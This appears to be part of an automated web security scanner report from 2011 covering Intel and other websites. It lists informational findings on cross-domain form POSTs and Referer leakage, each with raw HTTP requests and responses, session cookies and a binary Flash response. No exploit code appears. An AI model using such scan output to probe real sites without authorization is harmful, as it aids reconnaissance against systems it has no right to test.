GET /cp/vjVQa1PpcFNbtPuEzn9t8IoLmKkc5WncB0tdgv7Cbmg= HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:13:36 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 1018
Content-Type: application/x-shockwave-flash

CWS.....x.}U[s.F.........!n.c'M;.LLpbL2M...K...$.........H.1..y.#3}hK.........).G{....r...@...v.....O..    `|...^...-...m...[@..#'j.6...ekh....!.t..D..X....JV..J$...O...`..tw*....Qw'd{....q..>6.c.J..../j.....[m......a.[o..+/..;3.A...v.M\/..>%.e.6..F.#Qzn.$f.'$.....Z.R...+.]...V..N....&.o..    c..B!..1.........He.~..Z..]o..t..nr.UT.....i4.p..D..n7....s..No4h5p...H.x.k.[Ld...X..0
X ..M....v.sCt....9{...........%...L....gQR8.iy.....t..g.'p.....jor.........t=..3....bt}.N..`.....|..~0t.(.4..6..1........dE...`.........Q......'.N.#.X...{h..*.p.    TZ-.5. ...^.....l./.'9.......:.B..j..X.
]1.I.$.<_..X..,y=I3....'}..I.hs....4.Q..S.%..R../.0I
C.|..&mp.....V |..fAh..]2..|.X....q-?NAK......l.C..%.....|....AU.IU..!.....f.hz...d....2.R..}$.~".b......L./.B/..m.x6cs..,.....do....j.V..Se..O.....zV.>....zV..uEZ
Oe.9'......z....v.......h..A.........X..)#.h.=+.=.....R55=;.2.FS8....s/}.........%[tgR...#..I....N..T.F.3..v ... .1)\UEWy....*jB....9.......-...J..>....7.|..C(../mn.....+.l...6_U. .h.b....g.-w:..e#Z.E....m-.a...../..r.

16. Cross-domain POST  previous  next
There are 12 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


16.1. http://blogs.intel.com/csr/16  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /csr/16

Issue detail

The page contains a form which POSTs data to the domain www.feedburner.com. The form contains the following fields:
  • email
  • feed_btn
  • url
  • title
  • loc

Request

GET /csr/16 HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 23:16:16 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
CacheHit: D=9428 t=1296947776690668
Vary: Accept-Encoding
Connection: close
Content-Length: 29111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
<div class="mod-box-inner mod-email-subscription">
<form style="margin-top:10px; width:170px;" action="http://www.feedburner.com/fb/a/emailverify" method="post" target="popupwindow" onsubmit="window.open('http://www.feedburner.com/fb/a/emailverifySubmit?feedId=1789004', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
   <fieldset>
...[SNIP]...

16.2. http://blogs.intel.com/csr/assets_c/2011/02/DSC07688-thumb-300x225-thumb-200x150.jpg&  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /csr/assets_c/2011/02/DSC07688-thumb-300x225-thumb-200x150.jpg&

Issue detail

The page contains a form which POSTs data to the domain www.feedburner.com. The form contains the following fields:
  • email
  • feed_btn
  • url
  • title
  • loc

Request

GET /csr/assets_c/2011/02/DSC07688-thumb-300x225-thumb-200x150.jpg& HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 23:16:13 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
CacheHit: D=6095 t=1296947773852801
Connection: close
Content-Length: 29111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
<div class="mod-box-inner mod-email-subscription">
<form style="margin-top:10px; width:170px;" action="http://www.feedburner.com/fb/a/emailverify" method="post" target="popupwindow" onsubmit="window.open('http://www.feedburner.com/fb/a/emailverifySubmit?feedId=1789004', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
   <fieldset>
...[SNIP]...

16.3. http://blogs.intel.com/csr/assets_c/2011/02/DSC07688-thumb-300x225.php&  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /csr/assets_c/2011/02/DSC07688-thumb-300x225.php&

Issue detail

The page contains a form which POSTs data to the domain www.feedburner.com. The form contains the following fields:
  • email
  • feed_btn
  • url
  • title
  • loc

Request

GET /csr/assets_c/2011/02/DSC07688-thumb-300x225.php& HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 23:16:12 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
CacheHit: D=5172 t=1296947772818376
Connection: close
Content-Length: 29111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
<div class="mod-box-inner mod-email-subscription">
<form style="margin-top:10px; width:170px;" action="http://www.feedburner.com/fb/a/emailverify" method="post" target="popupwindow" onsubmit="window.open('http://www.feedburner.com/fb/a/emailverifySubmit?feedId=1789004', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
   <fieldset>
...[SNIP]...

16.4. http://blogs.intel.com/csr/tag/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /csr/tag/

Issue detail

The page contains a form which POSTs data to the domain www.feedburner.com. The form contains the following fields:
  • email
  • feed_btn
  • url
  • title
  • loc

Request

GET /csr/tag/ HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 23:16:12 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
CacheHit: D=8655 t=1296947772664051
Vary: Accept-Encoding
Connection: close
Content-Length: 29111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
<div class="mod-box-inner mod-email-subscription">
<form style="margin-top:10px; width:170px;" action="http://www.feedburner.com/fb/a/emailverify" method="post" target="popupwindow" onsubmit="window.open('http://www.feedburner.com/fb/a/emailverifySubmit?feedId=1789004', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
   <fieldset>
...[SNIP]...

16.5. http://blogs.intel.com/healthcare/healthcare/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /healthcare/healthcare/

Issue detail

The page contains a form which POSTs data to the domain www.feedburner.com. The form contains the following fields:
  • email
  • feed_btn
  • url
  • title
  • loc

Request

GET /healthcare/healthcare/ HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 23:16:22 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
CacheHit: D=6438 t=1296947782674402
Connection: close
Content-Length: 29111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
<div class="mod-box-inner mod-email-subscription">
<form style="margin-top:10px; width:170px;" action="http://www.feedburner.com/fb/a/emailverify" method="post" target="popupwindow" onsubmit="window.open('http://www.feedburner.com/fb/a/emailverifySubmit?feedId=1789004', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
   <fieldset>
...[SNIP]...

16.6. http://blogs.intel.com/healthcare/tag/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /healthcare/tag/

Issue detail

The page contains a form which POSTs data to the domain www.feedburner.com. The form contains the following fields:
  • email
  • feed_btn
  • url
  • title
  • loc

Request

GET /healthcare/tag/ HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 23:16:23 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
CacheHit: D=5364 t=1296947783001557
Connection: close
Content-Length: 29111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
<div class="mod-box-inner mod-email-subscription">
<form style="margin-top:10px; width:170px;" action="http://www.feedburner.com/fb/a/emailverify" method="post" target="popupwindow" onsubmit="window.open('http://www.feedburner.com/fb/a/emailverifySubmit?feedId=1789004', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
   <fieldset>
...[SNIP]...

16.7. http://blogs.intel.com/jobs/tag/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.intel.com
Path:   /jobs/tag/

Issue detail

The page contains a form which POSTs data to the domain www.feedburner.com. The form contains the following fields:
  • email
  • feed_btn
  • url
  • title
  • loc

Request

GET /jobs/tag/ HTTP/1.1
Host: blogs.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 23:16:19 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
CacheHit: D=6673 t=1296947779756026
Connection: close
Content-Length: 29111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
<div class="mod-box-inner mod-email-subscription">
<form style="margin-top:10px; width:170px;" action="http://www.feedburner.com/fb/a/emailverify" method="post" target="popupwindow" onsubmit="window.open('http://www.feedburner.com/fb/a/emailverifySubmit?feedId=1789004', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
   <fieldset>
...[SNIP]...

16.8. http://flesler.blogspot.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://flesler.blogspot.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:
  • cmd
  • submit
  • encrypted

Request

GET / HTTP/1.1
Host: flesler.blogspot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Sat, 05 Feb 2011 23:17:47 GMT
Date: Sat, 05 Feb 2011 23:17:47 GMT
Last-Modified: Fri, 04 Feb 2011 06:24:24 GMT
ETag: "ead027ca-aead-4359-8b36-1fe3cdfd8f2e"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=0, proxy-revalidate, must-revalidate
Age: 0
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/g
...[SNIP]...
<div class='widget-content'>
<form action="https://www.paypal.com/cgi-bin/webscr" style="text-align:center;margin:25px 0" method="post">
<input value="_s-xclick" name="cmd" type="hidden"/>
...[SNIP]...

16.9. http://flesler.blogspot.com/2007/10/jquerylocalscroll-10.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://flesler.blogspot.com
Path:   /2007/10/jquerylocalscroll-10.html

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:
  • cmd
  • submit
  • encrypted

Request

GET /2007/10/jquerylocalscroll-10.html HTTP/1.1
Host: flesler.blogspot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Sat, 05 Feb 2011 23:17:48 GMT
Date: Sat, 05 Feb 2011 23:17:48 GMT
Last-Modified: Fri, 04 Feb 2011 06:24:24 GMT
ETag: "ead027ca-aead-4359-8b36-1fe3cdfd8f2e"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=0, proxy-revalidate, must-revalidate
Age: 0
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/g
...[SNIP]...
<div class='widget-content'>
<form action="https://www.paypal.com/cgi-bin/webscr" style="text-align:center;margin:25px 0" method="post">
<input value="_s-xclick" name="cmd" type="hidden"/>
...[SNIP]...

16.10. http://flesler.blogspot.com/2007/10/jqueryscrollto.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://flesler.blogspot.com
Path:   /2007/10/jqueryscrollto.html

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:
  • cmd
  • submit
  • encrypted

Request

GET /2007/10/jqueryscrollto.html HTTP/1.1
Host: flesler.blogspot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Sat, 05 Feb 2011 23:17:47 GMT
Date: Sat, 05 Feb 2011 23:17:47 GMT
Last-Modified: Fri, 04 Feb 2011 06:24:24 GMT
ETag: "ead027ca-aead-4359-8b36-1fe3cdfd8f2e"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=0, proxy-revalidate, must-revalidate
Age: 0
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/g
...[SNIP]...
<div class='widget-content'>
<form action="https://www.paypal.com/cgi-bin/webscr" style="text-align:center;margin:25px 0" method="post">
<input value="_s-xclick" name="cmd" type="hidden"/>
...[SNIP]...

16.11. http://scoop.intel.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scoop.intel.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain www.feedburner.com. The form contains the following fields:
  • email
  • feed_btn
  • url
  • title
  • loc

Request

GET / HTTP/1.1
Host: scoop.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.3
X-Pingback: http://scoop.intel.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 48823

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xml:lang="e
...[SNIP]...
<div class="textwidget"><form class="subscribe" style="margin-top:10px; width:218px;" action="http://www.feedburner.com/fb/a/emailverify" method="post" target="popupwindow" onsubmit="window.open('http://www.feedburner.com/fb/a/emailverifySubmit?feedId=2413590', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true"><input type="text" class="text" name="email" value="Enter Your Email" onfocus="this.value=''" />
...[SNIP]...

16.12. http://scoop.intel.com/gapingvoid-art-gallery/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scoop.intel.com
Path:   /gapingvoid-art-gallery/

Issue detail

The page contains a form which POSTs data to the domain www.feedburner.com. The form contains the following fields:
  • email
  • feed_btn
  • url
  • title
  • loc

Request

GET /gapingvoid-art-gallery/ HTTP/1.1
Host: scoop.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.3
X-Pingback: http://scoop.intel.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39944

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xml:lang="e
...[SNIP]...
<div class="textwidget"><form class="subscribe" style="margin-top:10px; width:218px;" action="http://www.feedburner.com/fb/a/emailverify" method="post" target="popupwindow" onsubmit="window.open('http://www.feedburner.com/fb/a/emailverifySubmit?feedId=2413590', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true"><input type="text" class="text" name="email" value="Enter Your Email" onfocus="this.value=''" />
...[SNIP]...

17. Cross-domain Referer leakage  previous  next
There are 156 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


17.1. http://ark.intel.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ark.intel.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:
  • http://ark.intel.com/?iid=gg_prod-en_US+ark
The response contains the following links to other domains:
  • http://intelconsumerelectronics.com/?iid=subhdr+prodtop_conselec
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /?iid=gg_prod-en_US+ark HTTP/1.1
Host: ark.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P: C1
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=76390
Date: Sat, 05 Feb 2011 23:21:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 174001


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >

<head id="ctl00_ctl00_Head1">
   <script la
...[SNIP]...
<li class=" gaat40-null" id="gaat40-sbhdr_prod_top_col1_7"><a href="http://intelconsumerelectronics.com/?iid=subhdr+prodtop_conselec">Consumer Electronics</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.2. http://communities.intel.com/community/tech  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://communities.intel.com
Path:   /community/tech

Issue detail

The page was loaded from a URL containing a query string:
  • http://communities.intel.com/community/tech?iid=gg_support-EN_01+home_community_tech
The response contains the following links to other domains:
  • http://www.google-analytics.com/urchin.js
  • http://www.intc.com/index.cfm?iid=ftr+invrel
  • http://www.youtube.com/p/4C15E6689CB619EB&hl=en_US&fs=1

Request

GET /community/tech?iid=gg_support-EN_01+home_community_tech HTTP/1.1
Host: communities.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:55 GMT
Server: Apache
Set-Cookie: JSESSIONID=F83D1E593847FFD16959DD86E67DE82F.node7OP; Domain=.intel.com; Path=/
Set-Cookie: SecureScheme=true; Secure
Set-Cookie: jive.server.info="serverName=communities.intel.com:serverPort=80:contextPath=:localName=communities.intel.com:localPort=80:localAddr=communities.intel.com"; Version=1; Path=/
Set-Cookie: jive.recentHistory.-1=31342c323038313b; Expires=Mon, 07-Mar-2011 23:15:57 GMT; Path=/
X-JAL: 289
Content-Language: en-US
CacheHit: D=299072 t=1296947755814904
X-JSL: D=299076 t=1296947755814904
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<param name="allowscriptaccess" value="always"/><embed allowfullscreen="true" allowscriptaccess="always" height="385" src="http://www.youtube.com/p/4C15E6689CB619EB&amp;hl=en_US&amp;fs=1" type="application/x-shockwave-flash" width="470"></embed>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...
</div>


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

17.3. http://communities.intel.com/community/tech/desktop  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://communities.intel.com
Path:   /community/tech/desktop

Issue detail

The page was loaded from a URL containing a query string:
  • http://communities.intel.com/community/tech/desktop?iid=gg_support-EN_01+home_desktop_bds_forum
The response contains the following links to other domains:
  • http://www.google-analytics.com/urchin.js
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /community/tech/desktop?iid=gg_support-EN_01+home_desktop_bds_forum HTTP/1.1
Host: communities.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:53 GMT
Server: Apache
Set-Cookie: JSESSIONID=9C21E5903E93DD81AE6D1D9255026928.node6OP; Domain=.intel.com; Path=/
Set-Cookie: SecureScheme=true; Secure
Set-Cookie: jive.server.info="serverName=communities.intel.com:serverPort=80:contextPath=:localName=communities.intel.com:localPort=80:localAddr=communities.intel.com"; Version=1; Path=/
Set-Cookie: jive.recentHistory.-1=31342c323038323b; Expires=Mon, 07-Mar-2011 23:15:55 GMT; Path=/
X-JAL: 100
Content-Language: en-US
CacheHit: D=109217 t=1296947753192838
X-JSL: D=109222 t=1296947753192838
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...
</div>


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

17.4. http://communities.intel.com/index.jspa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://communities.intel.com
Path:   /index.jspa

Issue detail

The page was loaded from a URL containing a query string:
  • http://communities.intel.com/index.jspa?iid=hdr+communities
The response contains the following links to other domains:
  • http://counters.gigya.com/wildfire/IMP/CXNID=2000002.0NXC/bT*xJmx*PTEyMzQwNTczMjQ4MTAmcHQ9MTIzNDA1NzMzNDYwNyZwPTU*NDMxJmQ9Jmc9MSZ*PSZvPTNmODMyMmM4NzgzZjQ2YjM5ZmIyODk4ZTYyNmM*Y2Iz.gif
  • http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
  • http://serve.a-widget.com/service/getWidgetSwf.kickAction
  • http://www.google-analytics.com/urchin.js
  • http://www.intc.com/index.cfm?iid=ftr+invrel
  • http://www.slideoo.com/slider.swf

Request

GET /index.jspa?iid=hdr+communities HTTP/1.1
Host: communities.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:53 GMT
Server: Apache
Set-Cookie: JSESSIONID=4524562B999F8EC5FD2CF2E71C6D4102.node6OP; Domain=.intel.com; Path=/
Set-Cookie: SecureScheme=true; Secure
Set-Cookie: jive.server.info="serverName=communities.intel.com:serverPort=80:contextPath=:localName=communities.intel.com:localPort=80:localAddr=communities.intel.com"; Version=1; Path=/
X-JAL: 326
Content-Language: en-US
CacheHit: D=335896 t=1296947753478462
X-JSL: D=335901 t=1296947753478462
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<p align="center" width="100%"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" height="330" id="kickWidget_51193_19953" width="465"><param name="movie" value="http://serve.a-widget.com/service/getWidgetSwf.kickAction"/>
...[SNIP]...
<param name="allowScriptAccess" value="always"/><embed allowfullscreen="true" allowscriptaccess="always" flashvars="affiliateSiteId=51193&amp;widgetId=19953&amp;width=465&amp;height=330&amp;revision=6" height="330" name="kickWidget_51193_19953" pluginspage="http://www.macromedia.com/go/getflashplayer" src="http://serve.a-widget.com/service/getWidgetSwf.kickAction" type="application/x-shockwave-flash" width="465" wmode="transparent"></embed>
...[SNIP]...
<param name="flashvars" value="setId=&amp;size=_m&amp;max=25&amp;userid=25052095@N03&amp;setname=Intel%20Photos%27s%20photostream&amp;randomize=0"/><embed flashvars="setId=&amp;size=_m&amp;max=25&amp;userid=25052095@N03&amp;setname=Intel%20Photos%27s%20photostream&amp;randomize=0" height="170" src="http://www.slideoo.com/slider.swf" type="application/x-shockwave-flash" width="100%" wmode="transparent"></embed></object><img border="0" height="0" src="http://counters.gigya.com/wildfire/IMP/CXNID=2000002.0NXC/bT*xJmx*PTEyMzQwNTczMjQ4MTAmcHQ9MTIzNDA1NzMzNDYwNyZwPTU*NDMxJmQ9Jmc9MSZ*PSZvPTNmODMyMmM4NzgzZjQ2YjM5ZmIyODk4ZTYyNmM*Y2Iz.gif" style="visibility:hidden;width:0px;height:0px;" width="0"/></div>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...
</div>


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

17.5. http://digg.com/submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page was loaded from a URL containing a query string:
  • http://digg.com/submit?url=
The response contains the following links to other domains:
  • http://b.scorecardresearch.com/p?c1=2&c2=6299437&c3=&c4=&c5=&c6=&c15=&cj=1
  • http://cdn1.diggstatic.com/img/favicon.a015f25c.ico
  • http://cdn1.diggstatic.com/js/common/fb_loader.4050a241.js
  • http://cdn2.diggstatic.com/css/App_Submission/index.c3c738bb.css
  • http://cdn3.diggstatic.com/css/library/global.16354f29.css
